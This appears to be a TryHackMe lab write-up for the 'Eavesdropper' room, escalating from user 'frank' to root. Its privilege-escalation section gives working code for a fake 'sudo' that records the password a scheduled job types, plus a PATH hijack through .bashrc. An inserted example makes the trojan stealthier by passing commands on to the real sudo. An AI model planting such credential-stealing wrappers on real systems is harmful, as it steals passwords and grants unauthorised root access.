TryHackMe

Writeups for the rooms available in TryHackMe


https://tryhackme.com/room/eavesdropper

Difficulty: Medium

Enumeration:

This room provides an SSH private key for “frank” for initial access. I downloaded the key, restricted its permissions with ‘chmod 600’ (ssh refuses to use a private key that other users can read) and logged in as “frank”.


I started by listing the running processes and found very few of them. I also found that “frank” has sudo access:


I assumed that this might be a Docker container. To confirm, I ran ‘ls -la /’ to list all the files in the root directory and found a file called “.dockerenv”, which Docker creates in the root of every container, confirming that I was inside a container.
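As an added example, not part of the original writeup: a small shell function that checks the usual container markers (the .dockerenv file from the writeup plus Podman’s .containerenv and the cgroup path of PID 1), so the same conclusion can be reached with one command. It takes the filesystem root to inspect as an argument (an assumption made here so it can be pointed at a scratch directory), defaulting to /:

```shell
#!/bin/sh
# Added example, not from the original writeup: a broader container check than
# ls -la / alone. $1 is the filesystem root to inspect (defaults to /); passing
# a scratch directory lets you exercise it without being inside a container.
in_container() {
    root="${1:-/}"
    root="${root%/}"        # strip a trailing slash so the paths below join cleanly
    # Docker drops an empty .dockerenv into the container's root filesystem.
    if [ -e "$root/.dockerenv" ]; then
        echo docker
        return 0
    fi
    # Podman and CRI-O leave /run/.containerenv instead.
    if [ -e "$root/run/.containerenv" ]; then
        echo containerenv
        return 0
    fi
    # cgroup v1 hosts: PID 1's cgroup path names the runtime that created it.
    if grep -qE 'docker|lxc|kubepods|containerd' "$root/proc/1/cgroup" 2>/dev/null; then
        echo cgroup
        return 0
    fi
    echo none
    return 1
}

# Usage on a live box: prints the marker that matched, exit status 0 if any did.
in_container / || echo "no container marker found"
```

The function prints which marker matched and returns non-zero when none does, so it can be used both interactively and in an `if in_container; then …` guard.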



Priv Esc:

Moving ahead, I ran LinPEAS looking for a privilege-escalation vector but found nothing. After that, I watched process activity with ‘pspy’, which shows commands spawned by other users without needing root:


I observed that something else was also using the ‘frank’ account, running sudo to read the shadow file roughly every 30 seconds. So it is a scheduled job, and if we can abuse it we can capture the password it supplies to sudo. That password is frank’s own sudo password, but since frank has sudo access that is enough to become root.

Because the job runs as ‘frank’ with frank’s environment (it picks up frank’s .bashrc), we can hijack ‘PATH’ and plant a fake ‘sudo’ that gets executed instead of the real one.

frank@workstation:~$ mkdir ./bin
frank@workstation:~$ touch ./bin/sudo
frank@workstation:~$ chmod +x ./bin/sudo

Since frank’s sudo access requires a password, the job has to type one. We put the following script into the fake sudo file; it prompts for the password and appends whatever it receives to a file:

#!/bin/bash
# Fake sudo: read the password the scheduled job types and append it to a file.
# -r keeps backslashes in the password literal, -s suppresses echo like real sudo.
printf 'Enter password: '
read -rs password
printf '\n'

printf '%s\n' "$password" >> /home/frank/password.txt

After this, we need to put our directory at the front of frank’s PATH so that our fake sudo is found before /usr/bin/sudo. That can be done by adding the following line to frank’s .bashrc:

export PATH=/home/frank/bin:$PATH
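The complete hijack as one script, added here as an example and not taken from the original writeup or from the room. It assumes the victim’s home directory is passed as the first argument and uses two hypothetical environment variables, FAKE_SUDO_LOG and FAKE_SUDO_REAL, so the log path and the location of the genuine sudo can be redirected when trying it out; on the target the defaults (~/password.txt and /usr/bin/sudo) apply. Compared with the script above, the fake sudo prints the real prompt text and forwards the command to the genuine binary with sudo -S, so the scheduled job still succeeds and the tampering is less obvious:

```shell
#!/bin/sh
# Added example, not part of the original writeup: installs the PATH hijack in
# one go. $1 is the victim's home directory (/home/frank on the target, a
# scratch directory when testing). FAKE_SUDO_LOG and FAKE_SUDO_REAL are
# hypothetical knobs so the log file and the real sudo can be redirected.
install_sudo_hijack() {
    home="$1"
    mkdir -p "$home/bin"
    cat > "$home/bin/sudo" <<'EOF'
#!/bin/sh
LOG="${FAKE_SUDO_LOG:-$HOME/password.txt}"
REAL="${FAKE_SUDO_REAL:-/usr/bin/sudo}"
# Same prompt text the real sudo prints (to stderr); hide echo if we have a tty.
printf '[sudo] password for %s: ' "$(id -un)" >&2
stty -echo 2>/dev/null
IFS= read -r password
stty echo 2>/dev/null
printf '\n' >&2
printf '%s\n' "$password" >> "$LOG"
# Hand the original command to the genuine sudo, feeding it the captured
# password on stdin (-S), so the caller gets the result it expected.
printf '%s\n' "$password" | "$REAL" -S "$@"
EOF
    chmod 700 "$home/bin/sudo"
    # Prepend our directory so it is searched before /usr/bin; add the line once.
    grep -qs "$home/bin" "$home/.bashrc" || \
        printf 'export PATH=%s/bin:$PATH\n' "$home" >> "$home/.bashrc"
}

# On the target, run as frank: install_sudo_hijack /home/frank
```

Run it once; the next shell the job starts will pick up the new PATH. If the job used a non-interactive shell that never reads .bashrc, the same export would have to go wherever that shell reads its environment (.profile or .bash_profile).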


After doing this, we only have to wait for the next run of the job and then read the password from ‘password.txt’:


Using the captured password, I ran sudo to switch to root.


As root, I read the flag in the root home directory. (pwn3d!🙂)
